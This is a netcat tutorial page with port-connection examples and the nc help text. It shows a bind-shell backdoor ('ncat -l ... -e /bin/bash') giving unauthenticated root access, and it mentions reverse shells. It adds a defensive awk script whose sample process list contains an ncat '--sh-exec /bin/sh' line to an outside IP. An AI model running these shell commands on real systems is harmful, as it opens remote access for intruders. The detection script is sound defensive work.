nc netcat opening listening ports – Netcat scan examples
Netcat (often abbreviated as nc) is a versatile command-line utility used for managing network connections. Known as the “Swiss army knife” of networking tools, Netcat allows users to read from and write to network connections using the TCP or UDP protocols. It is often used by system administrators, network engineers, and security professionals for various tasks, including debugging, port scanning, file transfers, and creating backdoors for network testing.
Netcat opening listening ports
Establish a connection to a remote port if open:
[~]# nc -vn 192.168.2.101 22
Ncat: Connected to 192.168.2.101:22.
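SSH-2.0-OpenSSH_7.6
As you can see, netcat reached port 22 and established the connection successfully; the banner line identifies the service as OpenSSH 7.6.
Netcat can also connect to UDP ports with the -u option. Because UDP is connectionless, "Connected" here only means the local socket was set up, not that a service answered.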
[~]# ncat -v -u 1.1.1.1 53
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Connected to 1.1.1.1:53.
Netcat can also open a backdoor on a system. The command below listens on port 54321, runs /bin/bash for whoever connects (-e), and sets a 5000ms timeout (-w):
[~]# ncat -l 54321 -e /bin/bash -v -w 5000ms
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 18E1 2645 4F8C 9E87 EAD3 DBC5 0901 B9B9 393D 0E77
Ncat: Listening on :::54321
Ncat: Listening on 0.0.0.0:54321
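This opens the backdoor on port 54321 on the local system; connecting to that port then gives system access. The listener is bound to all interfaces (:: and 0.0.0.0) and asks for no authentication, so anyone who can reach the port gets a shell as the user running ncat (root in this session):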
[~]# ncat 127.0.0.1 54321 -v
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Connected to 127.0.0.1:54321.
ls
anaconda-ks.cfg
el_dlurls.txt
file
pwd
/root
whoami
root
uname -r
4.xx.xx.fc28.x86_64
^C
[root@localhost ~]#
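One way to spot a listener like the one above from the host side, as an added example that is not part of the original page: a POSIX shell function that reads process lines in `ps -eo pid=,user=,args=` format and flags nc/ncat/netcat processes started with an exec option. The function names and the sample process list are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag nc/ncat/netcat processes started with an exec option.
# Input, one process per line: PID USER COMMAND ARGS...
# (the format produced by: ps -eo pid=,user=,args=)

find_nc_exec() {
    awk '
    {
        # Field 3 is the executable; drop any directory part.
        n = split($3, parts, "/"); exe = parts[n]
        if (exe != "nc" && exe != "ncat" && exe != "netcat") next
        listen = "no"; prog = ""
        for (i = 4; i <= NF; i++) {
            a = $i
            # -l alone or inside a short cluster (-lvp), or --listen.
            if (a == "--listen" || a ~ /^-[A-Za-z0-9]*l/) listen = "yes"
            # Exec options: long forms, a short cluster ending in e
            # (-e, -lve), and -c for Ncat only (other nc builds use -c
            # for something else).
            if (a == "--exec" || a == "--sh-exec" || a == "--lua-exec" ||
                a ~ /^-[A-Za-z0-9]*e$/ ||
                (exe == "ncat" && a ~ /^-[A-Za-z0-9]*c$/))
                prog = (i < NF) ? $(i + 1) : "?"
        }
        if (prog != "")
            printf "%s %s listen=%s exec=%s\n", $1, $2, listen, prog
    }'
}

# Constructed sample process list (not captured from a real host).
sample_ps() {
    cat <<'EOF'
812 root /usr/sbin/sshd -D
2301 root ncat -l 54321 -e /bin/bash -v -w 5000ms
2377 alice nc -vn 192.168.2.101 22
2410 bob /usr/bin/nc -lvp 4444
2455 www-data /usr/bin/ncat 203.0.113.7 9001 --sh-exec /bin/sh
EOF
}

sample_ps | find_nc_exec
# On a live system: ps -eo pid=,user=,args= | find_nc_exec
```

Only space-separated option forms are matched; a renamed binary or an attached form such as --exec=/bin/bash is not caught, so pair this with a review of listening sockets.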
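Take a look at the nc --help option if you want to learn more about how to use netcat. The usage output below comes from the nc build shipped by Apple (note the --apple-* options), so its flags differ from the Ncat examples above: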
usage: nc [-46AacCDdEFhklMnOortUuvz] [-K tc] [-b boundif] [-i interval] [-p source_port]
[--apple-recv-anyif] [--apple-awdl-unres]
[--apple-boundif ifbound]
[--apple-no-cellular] [--apple-no-expensive]
[--apple-no-flowadv] [--apple-tcp-timeout conntimo]
[--apple-tcp-keepalive keepidle] [--apple-tcp-keepintvl keepintvl]
[--apple-tcp-keepcnt keepcnt] [--apple-tclass tclass]
[--tcp-adp-rtimo num_probes] [--apple-initcoproc-allow]
[--apple-tcp-adp-wtimo num_probes]
[--setsockopt-later] [--apple-no-connectx]
[--apple-delegate-pid pid] [--apple-delegate-uuid uuid]
[--apple-kao] [--apple-ext-bk-idle]
[--apple-netsvctype svc] [---apple-nowakefromsleep]
[--apple-notify-ack] [--apple-sockev]
[--apple-tos tos] [--apple-tos-cmsg]
[-s source_ip_address] [-w timeout] [-X proxy_version]
[-x proxy_address[:port]] [hostname] [port[s]]
Key Features:
- Port Scanning: Netcat can scan for open ports on a system by attempting to establish a connection to a range of IP addresses and ports. This helps identify available services or potential security vulnerabilities.
- File Transfers: Netcat can transfer files between machines by creating a simple listener on one machine and sending data from the other. For example, using "nc -l 1234 > file.txt" on one system and "nc IP_ADDRESS 1234 < file.txt" on the other allows for easy file transfer.
- Creating Reverse Shells: One of its powerful uses is in creating reverse shells, which can allow remote access to systems for testing or recovery purposes. This feature makes it popular in penetration testing.
- Simple Chat Utility: By connecting two systems through specific ports, Netcat can also be used to create a basic chat interface between machines.
Netcat is highly regarded due to its simplicity and flexibility in network manipulation, but its capabilities should be used responsibly, as they can also be exploited for malicious activities. Being both lightweight and powerful, it remains a staple tool in the networking and cybersecurity toolbox.